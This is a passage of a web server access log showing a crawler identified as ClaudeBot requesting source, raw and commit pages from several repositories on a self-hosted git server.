"/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12751] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14409] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 10973] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11914] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 216.73.216.188] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 15796] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16467] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11061] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14192] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 216.73.216.188] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 10970] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13869] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13078] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache?display=rendered" [Client 216.73.216.188] [Length 11151] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 216.73.216.188] [Length 14650] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html?display=source" [Client 216.73.216.188] [Length 31024] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 16059] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 16640] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10939] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11964] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 21542] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 9894] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 216.73.216.188] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10106] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12467] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=source" [Client 216.73.216.188] [Length 12012] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11917] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 15789] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11282] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10122] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13077] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" [Client 216.73.216.188] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 10939] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13425] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" [Client 216.73.216.188] [Length 10171] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" [Client 216.73.216.188] [Length 10509] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14408] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=rendered" [Client 216.73.216.188] [Length 11209] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11059] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 